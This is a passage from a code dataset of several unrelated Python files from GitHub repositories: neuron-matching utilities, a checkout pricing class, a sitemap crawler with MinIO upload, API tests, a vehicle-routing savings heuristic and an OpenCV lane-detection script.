)\n            props_right['is_matched'] = pd.Series(is_matched_right)\n            rincom, rincom_match, rcom, rcom_match = _match_category_helper(\n                props_right,\n                max_open_ends=max_open_ends,\n                min_nodes=min_nodes )\n\n            right_incom.append( rincom )\n            right_incom_match.append( rincom_match )\n            right_com.append( rcom )\n            right_com_match.append( rcom_match )\n            right_total.append( rincom+rincom_match+rcom+rcom_match )\n\n    out
= pd.DataFrame( {'Annotation':anno_names,\n 'Left Total':left_total,\n 'Left Unmatched Incomplete': left_incom,\n 'Left Matched Incomplete' : left_incom_match,\n 'Left Unmatched Complete' : left_com,\n 'Left Matched Complete' : left_com_match,\n 'Right Total':right_total,\n 'Right Unmatched Incomplete': right_incom,\n 'Right Matched Incomplete' : right_incom_match,\n 'Right Unmatched Complete' : right_com,\n 'Right Matched Complete' : right_com_match,\n } )\n return out\n \n\ndef _match_category_helper( props, max_open_ends, min_nodes ):\n incom = sum(\n np.logical_and( np.logical_or( props['fraction_open_ends'] >= max_open_ends,\n props['node_count'] <= min_nodes ),\n props['is_matched'] == False )\n )\n\n incom_match = sum(\n np.logical_and( np.logical_or( props['fraction_open_ends'] >= max_open_ends,\n props['node_count'] <= min_nodes ),\n props['is_matched'] == True )\n )\n com = sum(\n np.logical_and( np.logical_and( props['fraction_open_ends'] < max_open_ends,\n props['node_count'] > min_nodes ),\n props['is_matched'] == False )\n )\n com_match = sum(\n np.logical_and( np.logical_and( props['fraction_open_ends'] < max_open_ends,\n props['node_count'] > min_nodes ),\n props['is_matched'] == True )\n )\n return incom, incom_match, com, com_match\n\ndef get_matched_id( skid, CatmaidInterface, pair_meta, include_self=False ):\n \"\"\"\n\n \"\"\"\n annos_with_meta = CatmaidInterface.get_annotations_from_meta_annotations( pair_meta, flatten=True )\n annos_for_skid = CatmaidInterface.get_annotations_for_objects( [skid] )\n pair_anno = list( set(annos_with_meta).intersection(annos_for_skid) )\n if len(pair_anno) > 0:\n ids_in_pair = CatmaidInterface.get_ids_from_annotations(pair_anno,flatten=True)\n if include_self:\n return list( set( ids_in_pair ) )\n else:\n return list( set( ids_in_pair ).difference(set([skid])) )\n else:\n print('No matched neuron!')\n return None\n\n\ndef filter_complete( id_list, CatmaidInterface, max_open_ends=0.03, min_node_count = 500, sensory_exception=False ):\n \"\"\"\n\n \"\"\"\n props = property_summary_estimated( id_list, CatmaidInterface )\n if sensory_exception:\n filt = (props['fraction_open_ends'] < max_open_ends) & (props['node_count'] > min_node_count)\n else:\n filt = (props['fraction_open_ends'] < max_open_ends) & (props['node_count'] > min_node_count) & ~(props['is_fragment'])\n\n return list( props[ filt ].index.values )\n\ndef _paired_ids_matched( CatmaidInterface,\n match_report_df,\n pair_meta,\n max_open_ends=0.03,\n min_node_count = 500 ):\n\n pair_list = []\n for row in match_report_df.iterrows():\n if isinstance( row[1]['Group_1'], np.integer ):\n rel_ids_1 = [row[1]['Group_1']]\n else:\n rel_ids_1 = row[1]['Group_1']\n\n if isinstance( row[1]['Group_2'], np.integer ):\n rel_ids_2 = [row[1]['Group_2']]\n else:\n rel_ids_2 = row[1]['Group_2']\n\n for id1 in rel_ids_1:\n for id2 in rel_ids_2:\n pair_list.append( [id1, id2] )\n return pair_list\n\ndef _paired_ids_unmatched_ipsilateral( CatmaidInterface,\n id_list_1,\n id_list_2,\n pair_meta,\n max_open_ends=0.03,\n min_node_count = 500 ):\n\n pair_list = []\n for ind, id1 in enumerate(id_list_1):\n for id2 in id_list_1[ind+1:]:\n pair_list.append([id1, id2])\n\n for ind, id1 in enumerate(id_list_2):\n for id2 in id_list_2[ind+1:]:\n pair_list.append([id1, id2])\n return pair_list\n\ndef _paired_ids_unmatched_contralateral( CatmaidInterface,\n id_list_1_comp,\n id_list_2_comp,\n match_report_df,\n pair_meta,\n max_open_ends=0.03,\n min_node_count = 500 ):\n\n pair_list = []\n for row in 
match_report_df.iterrows():\n if isinstance( row[1]['Group_1'], np.integer ):\n match_ids_1 = [row[1]['Group_1']]\n else:\n match_ids_1 = row[1]['Group_1']\n non_match_ids_1 = list( \n set(id_list_1_comp).difference(set(match_ids_1))\n )\n\n if isinstance( row[1]['Group_2'], np.integer ):\n match_ids_2 = [row[1]['Group_2']]\n else:\n match_ids_2 = row[1]['Group_2']\n non_match_ids_2 = list( \n set(id_list_2_comp).difference(set(match_ids_2))\n )\n\n for id1 in match_ids_1:\n for id2 in non_match_ids_2:\n pair_list.append([id1,id2])\n\n for id2 in match_ids_2:\n for id1 in non_match_ids_1:\n pair_list.append([id1,id2])\n return pair_list\n\ndef make_id_pairs( CatmaidInterface,\n id_list_1,\n id_list_2,\n pair_meta,\n max_open_ends=0.03,\n min_node_count = 500,\n sensory_exception = False ):\n\n if type(id_list_1) is str:\n id_list_1 = CatmaidInterface.get_ids_from_annotations( id_list_1,\n flatten=True )\n if type(id_list_2) is str:\n id_list_2 = CatmaidInterface.get_ids_from_annotations( id_list_2,\n flatten=True )\n\n id_list_1_comp = filter_complete( id_list_1,\n CatmaidInterface,\n max_open_ends=max_open_ends,\n min_node_count=min_node_count,\n sensory_exception=sensory_exception)\n id_list_2_comp = filter_complete( id_list_2,\n CatmaidInterface,\n max_open_ends=max_open_ends,\n min_node_count=min_node_count,\n sensory_exception=sensory_exception)\n\n match_report_df = match_report( id_list_1_comp,\n id_list_2_comp,\n pair_meta,\n CatmaidInterface,\n name1='Group_1',\n name2='Group_2').drop('Unmatched')\n\n pairs_matched = _paired_ids_matched( CatmaidInterface,\n match_report_df,\n pair_meta,\n max_open_ends=max_open_ends,\n min_node_count=min_node_count)\n\n pairs_ipsi = _paired_ids_unmatched_ipsilateral( CatmaidInterface,\n id_list_1_comp,\n id_list_2_comp,\n pair_meta,\n max_open_ends=max_open_ends,\n min_node_count=min_node_count )\n\n pairs_contra = _paired_ids_unmatched_contralateral( CatmaidInterface,\n id_list_1_comp,\n id_list_2_comp,\n match_report_df,\n pair_meta,\n max_open_ends=max_open_ends,\n min_node_count=min_node_count )\n\n return pairs_matched, pairs_ipsi, pairs_contra\n\n\ndef match_groups_arbitrary( list_of_id_lists,\n match_via,\n CatmaidInterface,\n nrns = None,\n anno_reference='names' ):\n \"\"\"\n Given N lists of neurons, create lists of groups based on a shared\n annotation (such as cell type) within a 'match_via' metaannotation.\n\n Parameters\n ----------\n id_list1 : list of list of ints\n List of skeleton ids in groups. Could be >2.\n\n match_via : string or int\n Annotation (as name or id) that annotates the annotations to match.\n\n CatmaidInterface : CatmaidDataInterface\n Interface for the Catmaid instance to query.\n\n nrns : NeuronListObject (default None)\n Optional NeuronListObject which already has neuron annotations\n listed. 
Must have all ids in list of id_lists to work.\n\n anno_reference : 'names' or 'ids' (optional, default is 'names')\n\n Returns\n -------\n dict\n Match report, indexed by annotation name or id.\n \"\"\"\n annos_with_meta = set(CatmaidInterface.get_annotations_from_meta_annotations( match_via, flatten=True ) )\n annos_to_pair = []\n if nrns is None:\n for id_list in list_of_id_lists:\n annos_to_pair.append( { nid: set(CatmaidInterface.get_annotations_for_objects( [nid] )).intersection(annos_with_meta) for nid in id_list} )\n else:\n for id_list in list_of_id_lists:\n annos_to_pair.append( {nid: set( nrns[nid].annotations ).intersection(annos_with_meta) for nid in id_list} )\n\n matches = {}\n for group_ind, id_list in enumerate(list_of_id_lists):\n for nid in id_list:\n paired_annos = annos_to_pair[group_ind][nid]\n for anno in paired_annos:\n if anno not in matches:\n matches[anno] = [[] for l in list_of_id_lists]\n matches[anno][group_ind].append( nid )\n\n return matches\n\n","repo_name":"ceesem/catalysis","sub_path":"catalysis/completeness.py","file_name":"completeness.py","file_ext":"py","file_size_in_byte":43287,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"5414896806","text":"from dataclasses import dataclass, field\nfrom collections import Counter\nfrom typing import Dict, List, Union, Any\n\nfrom moneyed import Money\n\n\n@dataclass\nclass Product:\n \"\"\"Class for keeping track of a Product\"\"\"\n code: str\n name: str\n unit_price: Dict[str, Dict]\n\n def get_unit_price(self) -> Money:\n return Money(self.unit_price[\"amount\"], self.unit_price[\"currency_code\"])\n\n\n@dataclass\nclass Checkout:\n products: Union[Dict[str, Product], List[Product]]\n product_discounts: Dict[str, Dict] = field(default_factory=dict)\n scanned_products: List = field(default_factory=list)\n default_currency: str = \"EUR\"\n\n def __post_init__(self):\n product_list = dict()\n for product in self.products:\n product_list[product.code] = product\n self.products = product_list\n\n def add_scanned_product(self, product_code: str) -> None:\n if product_code in self.products.keys():\n self.scanned_products.append(product_code)\n else:\n raise ValueError(\"Product code not found!\")\n\n def calculate_total(self) -> Money:\n sub_total = Money(\"0.00\", self.default_currency)\n if self.scanned_products:\n items_qty = Counter(self.scanned_products)\n\n for product_code, qty in items_qty.items():\n sub_total += self.calculate_item_subtotal(product_code, qty)\n self.products[product_code].get_unit_price()\n\n total = sub_total\n return total\n\n def calculate_item_subtotal(self, product_code: str, qty: int) -> Money:\n sub_total = Money(\"0.00\", self.default_currency)\n # One product can only have zero or one active discount at any moment.\n discount = self.get_active_product_discount(product_code)\n remaining_qty = qty\n\n if discount:\n if discount[\"type\"] == \"bulk\":\n if remaining_qty >= discount[\"min_qty\"]:\n unit_price = Money(\n discount[\"unit_price\"][\"amount\"],\n discount[\"unit_price\"][\"currency_code\"]\n )\n sub_total += unit_price * remaining_qty\n remaining_qty = 0\n\n elif discount[\"type\"] == \"package\":\n package_price = Money(\n discount[\"price\"][\"amount\"],\n discount[\"price\"][\"currency_code\"]\n )\n package_qty = remaining_qty // discount[\"qty\"]\n sub_total += package_price * package_qty\n remaining_qty = remaining_qty % discount[\"qty\"]\n\n if remaining_qty > 0:\n # Remaining subtotal without discounts\n 
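            # Hypothetical worked example (numbers not from the source): with a\n            # \"package\" discount of qty=3 at 20.00 and a unit price of 7.50,\n            # scanning 7 items yields 7 // 3 = 2 packages (40.00) plus\n            # 7 % 3 = 1 leftover unit, charged below at the full 7.50, for an\n            # item subtotal of 47.50.\n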
            unit_price = self.products[product_code].get_unit_price()\n            sub_total += unit_price * remaining_qty\n\n        return sub_total\n\n    def get_active_product_discount(self, product_code: str) -> Union[Any, Dict]:\n        discount = self.product_discounts.get(product_code, None)\n        if discount:\n            return discount[\"available_discounts\"].get(discount[\"active\"], None)\n        return None\n","repo_name":"RmaxTwice/novicap-cc-checkout","sub_path":"src/entities/checkout.py","file_name":"checkout.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"34642443671","text":"import io\n\nimport requests\nfrom minio import S3Error\n\nfrom .response import (\n    Response,\n    SucessfulResponse,\n)\nfrom .gz import (\n    is_gzipped,\n    gunzip\n)\nfrom .sitemap import (\n    Sitemap,\n    SitemapIndex,\n    SitemapUrlSet,\n    iter_sitemap_entries\n)\n\nfrom .celery_logger import logger\nfrom .exceptions import *\n\nconnect_timeout, read_timeout = 10.0, 60.0\n\ndef fetch_url(url:str):\n    try:\n        r = requests.get(\n            url=url,\n            allow_redirects=False,\n            timeout=(connect_timeout, read_timeout)\n        )\n        r.raise_for_status()\n        logger.info('SuccessfulResponse')\n        return SucessfulResponse(r.content)\n    except requests.exceptions.RequestException:\n        logger.info('SitemapRequestError')\n        raise SitemapRequestError()\n\ndef xml_parser(response: Response):\n    try:\n        assert isinstance(response, SucessfulResponse)\n    except AssertionError:\n        raise SitemapRequestError()\n    \n    if is_gzipped(response.content):\n        try:\n            content = gunzip(response.content)\n        except Exception as e:\n            logger.info('SitemapGunzipError')\n            raise SitemapGunzipError()\n    else:\n        content = response.content\n    \n    encoding = None\n    for enc in ('utf-8', 'cp1252', 'utf-8-sig'):\n        try:\n            content = content.decode(enc)\n            encoding = enc\n            break\n        except UnicodeError:\n            # try the next candidate encoding instead of failing on the first one\n            continue\n    \n    if not encoding:\n        logger.info('SitemapUnicodeError')\n        raise SitemapUnicodeError()\n\n    try:\n        s = Sitemap(content.encode('utf-8'))\n    except Exception as e:\n        logger.info('SitemapParsingError')\n        raise SitemapParsingError() \n\n    try:\n        assert s.type in ['sitemapindex', 'urlset']\n    except AssertionError:\n        logger.info('SitemapTypeNotHandledError')\n        raise SitemapTypeNotHandledError()\n\n    try:\n        urls = []\n        for d in iter_sitemap_entries(s):\n            if 'loc' in d.keys():\n                urls.append(d['loc'])\n        assert len(urls) > 0\n    except AssertionError:\n        logger.info('SitemapEmptyError')\n        raise SitemapEmptyError()\n\n    if s.type == 'sitemapindex':\n        logger.info(f'SitemapIndex: {len(urls)} url')\n        return SitemapIndex(urls)\n    elif s.type == 'urlset':\n        logger.info(f'SitemapUrlSet: {len(urls)} url')\n        return SitemapUrlSet(urls)\n    \n    \ndef upload_data_to_minio_s3(client, data:list, file_name:str, bucket:str):\n    try:\n        found = client.bucket_exists(bucket)\n        if not found:\n            # Bucket not found, creating one\n            client.make_bucket(bucket)\n        data_len = len(data)\n        data = '\\n'.join(data)\n        result = client.put_object(\n            bucket,\n            file_name,\n            io.BytesIO(data.encode()),\n            len(data)\n        )\n        logger.info(f'UploadedSuccessfully: {data_len} url')\n        return\n    except S3Error as exc:\n        logger.info('MinioS3Error')\n        raise MinioS3Error()\n    except UnicodeError:\n        logger.info('MinioS3UnicodeError')\n        raise MinioS3UnicodeError()\n\n","repo_name":"ossama131/machine-learning-methods-for-sitemap-analysis-compression-classification","sub_path":"distributed_crawler/proj/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"38695243406","text":"#!/usr/bin/env python3\n\nfrom gxs700 import usbint\nfrom gxs700 import im_util\n\n\ndef main():\n    import argparse\n\n    parser = argparse.ArgumentParser(\n        description='Get default calibration file directory for attached sensor'\n    )\n    _args = parser.parse_args()\n\n    gxs = usbint.GXS700(do_print=False)\n    print(im_util.default_cal_dir(j=gxs.get_json()))\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"JohnDMcMaster/gxs700","sub_path":"cal_dir.py","file_name":"cal_dir.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"83"}
+{"seq_id":"30073462445","text":"from unittest.mock import patch\n\nimport pytest\n\nfrom chalicelib.errors import APIError\nfrom chalicelib.native_land import native_land_from_point\n\n\n@pytest.fixture\ndef empty_result(FakeResp):\n    return FakeResp(b\"[]\", 'OK', 200)\n\n\n@patch('chalicelib.geocode.session.request')\ndef test_good_location(mock_get, good_native_land_result):\n    '''It should return a list of dictionaries with the native lands Names'''\n    mock_get.return_value = good_native_land_result\n    result = native_land_from_point(42.553080, -86.473389)\n    assert [r['Name'] for r in result] == [\"Peoria\", \"Bodwéwadmi (Potawatomi)\"]\n\n\n@patch('chalicelib.geocode.session.request')\ndef test_404_location(mock_get, response_404):\n    '''It should raise if we get a 404 from api'''\n    mock_get.return_value = response_404\n    with pytest.raises(APIError):\n        native_land_from_point(42.553080, -86.473389)\n\n\n@patch('chalicelib.geocode.session.request')\ndef test_empty(mock_get, empty_result):\n    '''It should return an empty list from an empty response'''\n    mock_get.return_value = empty_result\n    assert native_land_from_point(42.553080, -86.473389) == []\n","repo_name":"codeforanchorage/land_acknowledgement_lambda","sub_path":"tests/test_native_land.py","file_name":"test_native_land.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"}
+{"seq_id":"35129349655","text":"import os\nimport sys\nimport mangadex\nimport json\nimport pytest\n\ndef read_json_files(filename : str, mode :str = \"r\") -> dict:\n    with open(filename, mode) as f:\n        resp = json.load(f)\n    return resp\n\nclass TestApi():\n    api = mangadex.Api()\n    timeout = 5\n    def test_SearchManga(self):\n        # we're going to search for the iris zero\n        failed = False\n        resp = self.api.get_manga_list(title = \"iris zero\", limit = 1)[0]\n\n        try:\n            saved_resp = read_json_files(\"test/saved_search_manga_response.json\")\n        except FileNotFoundError:\n            print(\"File not found\")\n            failed = True\n\n        if failed:\n            return False\n\n        saved_resp = mangadex.Manga._create_manga(saved_resp[\"results\"][0])\n\n        assert resp == saved_resp, \"The Manga objects are not equal\"\n    \n    def test_GetMangaChapter(self):\n        failed = False\n        resp = self.api.get_chapter(id = \"015979c8-ffa4-4afa-b48e-3da6d10279b0\")\n        try:\n            saved_resp = read_json_files(\"test/saved_get_chapter_response.json\")\n        except FileNotFoundError:\n            # fall back to the local copy; only mark the test failed if neither file exists\n            try:\n                saved_resp = read_json_files(\"saved_get_chapter_response.json\")\n            except FileNotFoundError:\n                print(\"File not found, test failed\")\n                failed = True\n        \n        if failed:\n            return False\n\n        saved_resp = mangadex.Chapter._create_chapter(saved_resp)\n\n        assert resp == saved_resp, \"The Chapter Objects are not equal\"\n\n    # def test_save_jsons(self):\n    #     url = f\"{self.api.URL}/author/df765fdc-ea9f-45d0-9191-d95615662d49\"\n    #     with open(\"test/saved_get_author_id_response.json\", \"w+\") as f:\n    #         json.dump(mangadex.URLRequest._request_url(url, \"GET\", timeout=self.timeout),f)\n    \n    def test_GetAuthor(self):\n        failed = False\n        resp = self.api.get_author_by_id(id = \"df765fdc-ea9f-45d0-9191-d95615662d49\")\n        try:\n            saved_resp = read_json_files(\"test/saved_get_author_id_response.json\")\n        except FileNotFoundError:\n            # fall back to the local copy; only mark the test failed if neither file exists\n            try:\n                saved_resp = read_json_files(\"saved_get_author_id_response.json\")\n            except FileNotFoundError:\n                print(\"File not found, test could not be completed\")\n                failed = True\n        \n        if failed:\n            return False\n\n        saved_resp = mangadex.Author._create_author(saved_resp)\n\n        assert resp == saved_resp, \"The Author Objects are not equal\"\n\n    def test_GetScanlationGroup(self):\n        raise NotImplementedError\n    \n    def test_GetTags(self):\n        raise NotImplementedError\n    \n    def test_GetMangaChaptersAndVolumes(self):\n        raise NotImplementedError\n\n","repo_name":"TLaks/mangadex","sub_path":"test/test_unittest.py","file_name":"test_unittest.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"}
+{"seq_id":"18564001633","text":"a=[4,3,5,6,5,1,2] ## list (saraksts)\na.append(8) ## append 8\na.append('ku') ## append 'ku'\na.remove(5) ## remove the first 5\nprint (a) ## print a\na[2]=10 ## put 10 into element 2\ndel a[7] ## delete element 7\nprint (a) ##\na.sort() ##\na.reverse() ## descending order\nprint (a) ##\n\nb='computer' ##\nprint(b)\n\n\nc=list(map(lambda x: x**2,a)) ## square\nprint(c)\n\nd=[3,5,3,5,8,8,8,3,8,7,3,5,]\nprint (d.count(5)) ## prints the number of fives\n\nf=list(map(lambda x: x**0.5,c)) ## sqrt\nprint(f)\n\nc.extend(f)\nprint(c)\n\na.extend(c)\nprint(a)","repo_name":"berwy/saraksti-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"74475308432","text":"from collections import deque\n\ndef calc_saving(unrouted, i, distMatrix):\n    savings = [ (distMatrix[i,0] + distMatrix[0,j] - distMatrix[i,j], - distMatrix[i,j], i, j) for j in unrouted if i != j ]\n    savings.sort()\n    return savings\n\n\ndef sequential_savings_init(distMatrix, demandList, truckCapacity = 1.0):\n    \n    C_EPS = 1e-10\n    \n    N = len(distMatrix)\n\n    # nodes not in a route\n    # 0 = depot that will not be in a route\n    unrouted = set(range(1, N))\n    \n    # generate a list of node indices for route initialization\n    customerIndices = list(range(1, N))\n    customerIndices.sort(reverse = True, key = lambda i: ( distMatrix[0][i],i) )\n    \n    solution = [0]\n    savings = None\n    emerging_route_nodes = None\n\n    while unrouted:\n\n        # Initialize a new route\n        if not savings:\n            \n            while True:\n                customer = customerIndices.pop()\n                if customer in unrouted:\n                    break\n            \n            emerging_route_nodes = deque([customer])\n            unrouted.remove(customer)\n            \n            route_demand = demandList[customer]\n            \n            savings = calc_saving(unrouted, customer, distMatrix)\n            \n\n        while len(savings) > 0:\n\n            # i is the one to merge with\n            # j is the candidate to be merged\n            _, _, i, j = savings.pop()\n            \n\n            cw_saving = distMatrix[i,0] + distMatrix[0,j] - distMatrix[i,j]\n\n            if cw_saving < 0.0:\n                savings = []\n
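                # savings is kept sorted ascending and popped from the tail, so the\n                # pop above always yields the largest remaining Clarke-Wright saving;\n                # once that value turns negative, every later candidate is negative\n                # too, and the current route can be closed.\n                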
break\n \n\n if not j in unrouted:\n continue\n \n if truckCapacity and route_demand + demandList[j] - C_EPS > truckCapacity:\n continue # next savings\n \n # it is still a valid merge?\n do_left_merge = emerging_route_nodes[0] == i\n do_right_merge = emerging_route_nodes[-1] == i and\\\n len(emerging_route_nodes) > 1\n if not (do_left_merge or do_right_merge):\n continue # next savings\n \n \n # update the route demand\n route_demand += demandList[j]\n \n\n if do_left_merge:\n emerging_route_nodes.appendleft(j)\n if do_right_merge:\n emerging_route_nodes.append(j)\n\n unrouted.remove(j)\n \n # update the savings list\n savings += calc_saving(unrouted, j, distMatrix)\n savings.sort()\n \n \n emerging_route_nodes.append(0)\n solution += emerging_route_nodes\n emerging_route_nodes = None\n \n return solution","repo_name":"itsAlfantasy/FOR_Project","sub_path":"notebooks/cwSavings.py","file_name":"cwSavings.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"40897387529","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport grabber as grab\nimport time\nimport math\nimport joystick\n#\"C:/car vision proj/media/scr.jpg\"\n#path = \"C:/car vision proj/media/DR101423.AVI\"\n#path = \"D:/Denis/Downloads/2020-12-12 23-32-11.mp4\"\n#path = \"C:/car vision proj/media/withoutsound.mp4\"\n#path = \"D:/Denis/Downloads/withoutsound.mp4\"\npath = \"D:/video/2020-12-12 23-32-11.mp4\"\nclass visor():\n def __init__(self, colorimage):\n if type(colorimage) == type(\"sample\"):\n self.colorimage = cv2.imread(colorimage)\n \n else:\n self.colorimage = colorimage\n \n \n\n self.image = cv2.cvtColor(self.colorimage, cv2.COLOR_BGR2GRAY)\n #self.image = np.multiply(self.image, 10)\n\n\n self.lineColor = ((0,255,0),(0,0,255),(78,237,232)) # blue green red\n self.line_thickness = 2 \n self.canny_treshold = (50, 250)\n self.polygons = [[(80, 719), (1200,719),(727+40,320), (610-40,320)]] #MAUN ###############################\n #self.polygons = [[(0, 719), (1280,719),(640,360)]] #triangle\n #self.polygons = [[(0, 719), (1280,719),(640,360)]]\n #image parameters\n self.imageHeight = self.image.shape[0] #720 \n self.imageWidth = self.image.shape[1] #1280 \n\n self.lines = None\n self.leftLine = None\n self.rightLine = None\n self.averegedLines = None\n\n #images\n self.canny_image = None\n self.cropped_image = None\n self.line_image = None\n\n\n # Hough parameters\n self.RHO = 1 \n self.theta = np.pi/360\n self.houhgVoteTreshold = 50\n self.minLineLength = 20\n self.maxLineGap = 20\n\n\n self.slopeTreshold = 1 #0.5\n\n\n self.parCounter = 0\n\n self.foo = 0\n self.verticalLine = np.array([640, self.imageHeight, 640, 0])\n self.DoDisplayVerticalLine = True\n \n self.leftLineOLD = None\n self.rightLineOLD = None\n\n\n def canny(self):\n kernel = np.ones((7,7),np.float32)/40\n blur = cv2.filter2D(self.image,-1,kernel)\n #blur = cv2.GaussianBlur(self.image ,(7,7),0)\n self.canny_image = cv2.Canny(blur, self.canny_treshold[0], self.canny_treshold[1])\n\n\n def cropImage(self):\n polygon = np.array(self.polygons)\n mask = np.zeros_like(self.image)\n cv2.fillPoly(mask, polygon, 255)\n self.cropped_image = cv2.bitwise_and(self.canny_image, mask)\n\n\n def makeLines(self):\n self.lines = cv2.HoughLinesP(self.cropped_image,self.RHO,self.theta, self.houhgVoteTreshold, minLineLength = self.minLineLength, maxLineGap = self.maxLineGap)\n #@staticmethod\n def makeCoordinates(self, lineParameters):\n slope, 
intercept = lineParameters\n        y1 = self.imageHeight\n        y2 = int(y1*(3/5))\n        x1 = int((y1 - intercept)/slope) \n        x2 = int((y2 - intercept)/slope) \n        return np.array([x1,y1, x2,y2, 0])\n\n\n    def averageLines(self):\n        leftFit = []\n        rightFit = []\n        if self.lines is not None:\n            for line in self.lines:\n                x1, y1, x2, y2 = line.reshape(4)\n                slope, intercept = np.polyfit((x1,x2), (y1,y2), 1)\n                if slope < -self.slopeTreshold: # originally just <\n                    leftFit.append((slope, intercept))\n                    #leftSlope.append(slope)\n                elif slope > self.slopeTreshold: #>\n                    rightFit.append((slope, intercept))\n                    #rightSlope.append(slope)\n        self.leftFitAVG = np.average(leftFit, axis=0)\n        self.rightFitAVG = np.average(rightFit, axis=0)\n\n        try:\n            self.leftLine = self.makeCoordinates(self.leftFitAVG) \n        except Exception as e:\n            # print(e, '\\n')\n            # self.leftLine = np.array([0,0,0,0]) \n            pass\n        try:\n            self.rightLine = self.makeCoordinates(self.rightFitAVG)\n        except Exception as e:\n            pass\n            #print(e, '\\n')\n            #self.rightLine = np.array([0,0,0,0])\n\n\n        #debug\n        if self.DoDisplayVerticalLine == True:\n            self.averegedLines = np.array([self.leftLine,self.rightLine, self.verticalLine])\n        else:\n            self.averegedLines = np.array([self.leftLine,self.rightLine])#, self.verticalLine])\n\n\n    def newDisplayer(self): #lines = self. ...\n        self.line_image = np.copy(self.colorimage)\n        if self.leftLine is not None:\n            lx1, ly1, lx2, ly2, lcolor = self.leftLine.reshape(5)\n            cv2.line(self.line_image, (lx1,ly1), (lx2,ly2), self.lineColor[lcolor], self.line_thickness)\n            self.leftLine = np.array([lx1, ly1, lx2, ly2, 1])\n            self.leftLineOLD = np.copy(self.leftLine)\n        if self.rightLine is not None:\n            rx1, ry1, rx2, ry2, rcolor = self.rightLine.reshape(5)\n            cv2.line(self.line_image, (rx1,ry1), (rx2,ry2), self.lineColor[rcolor], self.line_thickness)\n            self.rightLine = np.array([rx1, ry1, rx2, ry2, 1])\n            self.rightLineOLD = np.copy(self.rightLine)\n\n\n    def updateImage(self, colorimage):\n        self.colorimage = colorimage\n        self.image = cv2.cvtColor(self.colorimage, cv2.COLOR_BGR2GRAY)\n        \n        self.image = self.image + 45\n        #self.image *= 2\n        self.imageHeight = self.image.shape[0] #720 \n        self.imageWidth = self.image.shape[1] #1280 \n\n    def show(self):\n        cv2.imshow(\"lines\", self.line_image) #self.line_image)\n        cv2.imshow(\"cropImage\", self.cropped_image)\n        #cv2.imshow(\"cropImage\", self.canny_image)\n\n\n    def lineCorrection(self):\n        if self.leftLine is not None or self.rightLine is not None:\n            try:\n                if (self.leftLine[4] == 0) and (self.rightLine[4] !=0):\n                    dx1, dy1, dx2, dy2 = 0,0,0,0\n                    dx1 = self.leftLine[0] - self.leftLineOLD[0]\n                    dy1 = self.leftLine[1] - self.leftLineOLD[1]\n                    dx2 = self.leftLine[2] - self.leftLineOLD[2] \n                    dy2 = self.leftLine[3] - self.leftLineOLD[3]\n                    a = [self.rightLine[0]+dx1, self.rightLine[1]+dy1, self.rightLine[2]+dx2, self.rightLine[3]+dy2, 2]\n                    self.rightLine = np.array(a)\n\n\n                if (self.rightLine[4] == 0) and (self.leftLine[4] !=0):\n                    dx1, dy1, dx2, dy2 = 0,0,0,0\n                    dx1 = self.rightLine[0] - self.rightLineOLD[0]\n                    dy1 = self.rightLine[1] - self.rightLineOLD[1]\n                    dx2 = self.rightLine[2] - self.rightLineOLD[2] \n                    dy2 = self.rightLine[3] - self.rightLineOLD[3]\n                    a = [self.leftLine[0]+dx1, self.leftLine[1]+dy1, self.leftLine[2]+dx2, self.leftLine[3]+dy2, 2]\n                    self.leftLine = np.array(a)\n            except Exception as e:\n                #print(e)\n                pass\n\n    def Do(self):\n        self.canny()\n        self.cropImage()\n        self.makeLines()\n        self.newDisplayer()\n        self.averageLines()\n        self.lineCorrection()\n\n\n    def debug(self):\n        try:\n            # estimates the steady lane slope (i.e. the curve of the road)\n            leftVector = np.array([self.leftLine[0] - self.leftLine[2], self.leftLine[1] - self.leftLine[3]])\n            rightVector = np.array([self.rightLine[0] - self.rightLine[2], self.rightLine[1] - self.rightLine[3]])\n            #print(leftVector, rightVector)\n            #print(leftVector + rightVector, \"\\n\")\n            diff = (1280/2) - np.average([self.leftLine[0], self.rightLine[0]])\n            force = diff #((diff/10))**2\n            # if diff<0:\n            #     force = -force \n            return force*1.5\n        except Exception as e:\n            return 0\n\n\nfoo = True\n# video \ncap = cv2.VideoCapture(path)\n_, startImage = cap.read()\nvisor = visor(colorimage = startImage)\nwhile (cap.isOpened()) and foo:\n    _, image = cap.read()\n    visor.updateImage(image)\n    visor.Do()\n    visor.show()\n    #force = visor.debug()\n    #joystick.setMouseByForce(force)\n    if cv2.waitKey(16) == ord(' '):\n        break\n\n#############################################screen capture\n# startImage = grab.grab()\n# visor = visor(colorimage = startImage)\n\n# while True:\n#     image = grab.grab()\n#     visor.updateImage(image)\n#     visor.Do()\n#     visor.show()\n#     force = visor.debug()\n#     joystick.setMouseByForce(force)\n#     if cv2.waitKey(33) == ord(' '):\n#         break\n\n","repo_name":"Zakalenka23/e_vision","sub_path":"finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":8635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
